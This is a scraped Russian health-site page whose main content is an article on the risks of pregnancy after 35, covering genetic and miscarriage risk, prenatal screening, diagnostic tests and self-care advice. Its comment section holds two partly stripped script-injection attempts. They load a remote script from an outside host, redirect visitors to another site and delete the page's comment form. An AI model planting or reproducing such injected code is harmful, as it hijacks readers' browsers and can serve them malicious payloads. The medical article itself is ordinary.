Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Опасно ли беременеть посл...  >>  Опасно ли беременеть после 35
 
Обратная связь
 

Опасно ли беременеть после 35

Размер шрифта
21 марта 2014 00:00
  • google_analytics: false
  • Нравится

Беременность после 35 лет имеет определенные преимущества, но и существенные недостатки. Наша статья поможет вам разобраться в том, какие опасности могут подстерегать беременную женщину в таком возрасте.

Опасно ли беременеть после 35

Опасности

У большинства женщин старше 35 лет беременность протекает хорошо, и на свет появляются здоровые дети. Риск для беременной женщины и ее ребенка чуть выше среднего, но все же достаточно низкий. Вот некоторые из возможных опасностей:

  • Наследственные заболевания: у женщин старшего возраста чаще рождаются дети с синдромом Дауна. В 25 лет риск рождения ребенка с синдромом Дауна составляет 0,08%, в 35 лет – 0,25% и в 45 лет – 3,3%.
  • Выкидыш: в большинстве случаев выкидыш случается в первые 13 недель беременности. С возрастом риск выкидыша увеличивается. К 35 годам он составляет 20%, к 45 – 80%.
  • Повышение артериального давления и сахарный диабет: у женщин старшего возраста эти проблемы наблюдаются чаще, они могут привести к выкидышу и задержке развития плода.
  • Смещение плаценты: предлежание плаценты – это состояние, при котором она полностью или частично перекрывает шейку матки, что увеличивает риск кровотечения во время родов. В 40 лет риск предлежания плаценты в 3 раза выше, чем в 20 лет.
  • Преждевременные роды и низкий вес: чем старше женщина, тем выше риск преждевременных родов (раньше 37 недель) и тем меньше будет весить малыш.

Пренатальный скрининг

Во время беременности каждая женщина периодически сдает анализы и проходит ультразвуковое обследование. Скрининговые обследования проводятся по желанию женщины и позволяют только предположить наличие заболевания у ребенка. К сожалению, во многих случаях результаты оказываются ложноположительными: в процессе обследования выявляют определенные нарушения, а ребенок рождается здоровым. Поэтому скрининговым методам полностью доверять нельзя. Вот некоторые из этих методов:

  • Определение толщины воротникового пространства представляет собой ультразвуковой метод исследования, который проводится в первом триместре беременности. Увеличение толщины воротникового пространства в сочетании с определенными изменениями в анализах крови указывает на высокий риск развития синдрома Дауна.
  • Четверной анализ представляет собой анализ крови, который проводится во втором триместре беременности. Он позволяет оценить риск развития синдрома Дауна и других наследственных заболеваний, а также дефекты нервной трубки. 

Положительный результат еще не означает, что у ребенка обязательно будет то или иное заболевание – он лишь свидетельствует о высоком риске. Женщинам старше 35 лет скрининг можно не проводить, а сразу  приступать к диагностическим обследованиям.

Диагностические обследования

Если результаты скрининга сомнительные, можно провести диагностические обследования, которые дают точные результаты. Однако эти обследования сопряжены с некоторым риском, в частности, в редких случаях могут спровоцировать выкидыш.

  • Амниоцентез – это процедура забора амниотической жидкости и клеток из матки с помощью тонкой иглы. Позволяет диагностировать синдром Дауна.
  • Биопсия ворсин хориона – это процедура забора клеток из плаценты, которые исследуют на генетические заболевания.
  • Кордоцентез – это процедура забора крови из вены, проходящей в пуповине. Выполняется при сомнительных результатах амниоцентеза и биопсии ворсин хориона.

Советы по уходу за собой

Во время беременности женщина должна уделять себе значительно больше внимания, чем раньше, особенно, если она старше 35 лет.

  • Регулярно посещайте женскую консультацию.
  • Принимайте витамины для беременных: фолиевая кислота, которая содержится в их составе, препятствует появлению определенных пороков развития.
  • Питайтесь правильно: беременной женщине нужно, в среднем, всего на 300 калорий в день больше, чем обычно.
  • Следите за своим весом и обсуждайте прибавку в весе с врачом.
  • Регулярно выполняйте физические упражнения.
  • Минимизируйте стресс: исключите из жизни все занятия, которые доставляют вам неудобство; объясните мужу, что вас раздражает; медитируйте или выполняйте дыхательные упражнения.
  • Обеспечьте себе полноценный отдых: беременной женщине нужно спать не менее 7-9 часов.
  • Не курите и оградите себя от пассивного курения. Если вы не можете бросить курить, поговорите с врачом – он вам поможет. Курение вредит не только организму беременной женщины, но и будущему ребенку.
  • Принимайте только те препараты, которые вам разрешил врач. Не используйте травы, не посоветовавшись с врачом.
Все о беременности и родах в нашем специальном проекте «Ребенок будет»!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

3 - Гость

16 марта 2016 в 21:05

Цитировать   |   Пожаловаться

Моя сестра Аня младше меня на 6 лет. В то время когда я уже была бабушкой она родила только первого ребёнка. Очень долго с мужем планировали, проходили курс лечения. Правда, часто на сохранении сестра лежала, примерно 6 раз за беременность. Ну ничего страшного,зато такая красивая родилась и здоровая) Кто ещё планирует стать "поздними" мамами советую почитать статьи на сайте

Статьи

       
ВИЧ и беременность. Как защититься?   Хламидия и беременность. Как защититься?   Гонорея и беременность. Как защититься?   Беременность: как обезопасить себя и будущего малыша от вирусов  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Можно ли беременеть после 40?
Еда и лекарства: когда их нельзя смешивать
Можно ли подгадать с беременностью?

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.